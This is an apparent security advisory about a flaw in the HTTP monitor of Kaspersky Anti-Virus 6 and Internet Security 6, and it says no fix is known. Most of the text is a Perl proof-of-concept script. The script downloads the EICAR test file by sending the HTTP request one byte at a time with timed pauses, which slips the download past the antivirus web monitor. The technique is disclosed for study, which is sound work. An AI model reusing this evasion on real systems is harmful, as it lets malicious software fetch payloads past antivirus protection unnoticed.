Kaspersky antivirus 6 Kaspersky internet security 6 www.kaspersky.com Vulnerable Systems: KAV6, KIS6 Detail: The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus). Any mailicious software on local computer can bypass HTTP virus monitor. Solution: There is no known solution. Exploit code: This perl script could be run with ActiveState Perl 5.8: use IO::Socket::INET; use strict; my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)', 'http://www.eicar.com/download/eicar.com' ); syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n"; my $s = IO::Socket::INET->new( PeerAddr => $h_srv, PeerPort => $h_port, Proto => 'tcp' ); die "socket: $!" unless $s; sendthem( $s, "GET $h_url HTTP/1.1", "Host: $h_srv", "" ); my $doc = read_body( $s, read_headers( $s ) ); syswrite STDOUT, 'document is <'.$doc.'> len='.length($doc)."\n"; sub sendthem { my $s = shift; my $c = 0; foreach( @_ ) { my @a = split //, $_; ++$c; syswrite STDOUT, "query $c: "; foreach( @a ) { sendone( $s, $_ ); } sendone( $s, "\r" ); sendone( $s, "\n" ); } } sub sendone { my( $s, $v ) = @_; $s->syswrite( $v ); syswrite STDOUT, $v; # !!! comment next line to have monitoring working ;) select( undef, undef, undef, 0.300 ); } sub read_headers { my( $s ) = @_; my( $c, $cl ) = ( 0, 0 ); for( ;; ) { my $l = read_line( $s ); ++$c; syswrite STDOUT, "header $c: $l"; syswrite STDOUT, "\r\n"; last if not $l and $c; $cl = $1 if $l =~ /^Content-Length:\s+(\d+)/; } $cl; } sub read_line { my( $s ) = @_; my $str = ''; for( ;; ) { my $v = ''; my $r = $s->sysread( $v, 1 ); die 'EOF reading headers!' unless $r; last if $v eq "\n"; next if $v eq "\r"; $str .= $v; } return $str; } sub read_body { my( $s, $cl ) = @_; my( $str, $cli ) = ( '', $cl ); syswrite STDOUT, "reading body ...\n"; for( ;; ) { my $v = ''; my $r = $s->sysread( $v, 1 ); last unless $r; $str .= $v; --$cl if $cli; last if not $cl and $cli; } return $str; }